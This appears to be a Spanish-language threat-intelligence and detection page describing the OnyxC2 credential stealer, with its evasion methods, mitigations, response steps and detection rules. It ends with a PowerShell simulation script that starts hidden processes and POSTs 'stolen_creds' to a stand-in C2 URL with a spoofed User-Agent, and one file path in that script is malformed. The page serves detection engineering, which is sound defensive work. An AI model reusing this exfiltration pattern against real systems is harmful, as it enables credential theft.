OnyxC2: Un Nuevo Stealer que Apunta a 210 Aplicaciones
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
OnyxC2 es un nuevo malware-como-servicio diseñado para robar credenciales, extensiones de autenticación de dos factores y billeteras de criptomonedas en aproximadamente 210 aplicaciones. La plataforma ofrece un kit de herramientas completo de estilo comercial, que incluye un panel de gestión, compilador y funcionalidad de acceso remoto. También se basa en métodos de evasión avanzada, incluyendo la carga de DLL lateral con binarios firmados sobredimensionados y componentes de carga útiles cifrados.
Investigación
Los investigadores de BlackFog examinaron múltiples muestras de OnyxC2 y descubrieron un método de carga de DLL lateral que abusa de un ejecutable anfitrión firmado junto con un DLL malicioso de más de 120 MB disfrazado como una biblioteca gráfica de NVIDIA. El análisis de red mostró el malware comunicándose a través de HTTPS con un punto final API de servidor específico. Los investigadores también encontraron superposiciones cifradas incrustadas dentro del DLL, ayudando al malware a evitar el análisis estático directo.
Mitigación
El despliegue de controles de anti-exfiltración de datos en el punto final puede ayudar a bloquear el tráfico saliente no autorizado independientemente del proceso usado. Los equipos de seguridad deben monitorear la carga sospechosa de DLLs asociada con binarios firmados e investigar archivos inusualmente grandes que aparezcan en rutas de escritura por el usuario. También se recomiendan políticas fuertes de control de aplicaciones y monitoreo de tareas programadas no autorizadas.
Respuesta
Si se detecta actividad de OnyxC2, aísle el sistema afectado inmediatamente para detener más robos de datos. Capture un volcado de memoria completo para recuperar la carga útil descifrada y revise en busca de sesiones HVNC activas o actividad de proxy SOCKS5. Revise todas las tareas programadas creadas recientemente e inspeccione los almacenes de credenciales del navegador en busca de evidencia de compromiso.
Flujo de Ataque
Detecciones
Comando y Control Sospechoso por Solicitud de DNS de Dominio de Nivel Superior (TLD) Inusual (vía dns)
Ver
IOCs (HashSha256) para detectar: Dentro de OnyxC2: El Nuevo Ladrón Apuntando a 210 Aplicaciones
Ver
IOCs (SourceIP) para detectar: Dentro de OnyxC2: El Nuevo Ladrón Apuntando a 210 Aplicaciones
Ver
IOCs (DestinationIP) para detectar: Dentro de OnyxC2: El Nuevo Ladrón Apuntando a 210 Aplicaciones
Ver
Detección de Comunicación OnyxC2 Stealer C2 y Anonimización TOR [Proxy]
Ver
Detección de Autorun de Tarea Programada OnyxC2 y Actividad de Keylogger [Creación de Proceso en Windows]
Ver
Ejecución de Simulación
Prerrequisito: El Check Preliminar de Telemetría y Línea Base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTPs identificadas y tienen como objetivo generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.
-
Narrativa del Ataque y Comandos: El adversario busca exfiltrar credenciales robadas del navegador. Para evitar la detección por monitoreo de seguridad de red, despliegan un binario Tor portátil para crear un túnel anonimizado. Una vez que se establece el túnel, el malware inicia una conexión a su servidor de Comando y Control (C2). Para mezclarse con el tráfico web legítimo, el malware falsifica su User-Agent para aparecer como «Cloudflare» y apunta a un punto final de API específico alojado detrás de un proxy de Cloudflare. Esta secuencia está diseñada para activar la correlación de
torargumentos de la línea de comandos y el patrón específico/backend/api/app.phpde la URL. -
Script de Prueba de Regresión:
# Simulación de Comunicación del Ladrón OnyxC2 # 1. Simular la presencia de Tor (Creando un archivo/proceso de comportamiento ficticio) # En un escenario real, este sería el tor.exe real $TorPath = "$env:TEMPtor.exe" "Contenido Binario de Tor Simulado" | Out-File -FilePath $TorPath # Crear un evento de ejecución de proceso para 'tor' vía línea de comandos Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo running tor service" -WindowStyle Hidden # Para asegurar que la lógica de detección 'command_line|contains: tor' se cumpla, # ejecutamos un comando que incluya la cadena 'tor' cmd.exe /c "echo initializing tor proxy..." # 2. Simular la Conexión de Red C2 # Usamos PowerShell para simular una conexión de red con la URL específica y el User-Agent $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php" $UserAgent = "Cloudflare-Proxy-Agent/1.0" Write-Host "Intentando comunicación C2 a $C2Url" Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue -
Comandos de Limpieza:
# Remover artefactos simulados Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue Write-Host "Limpieza de simulación completa."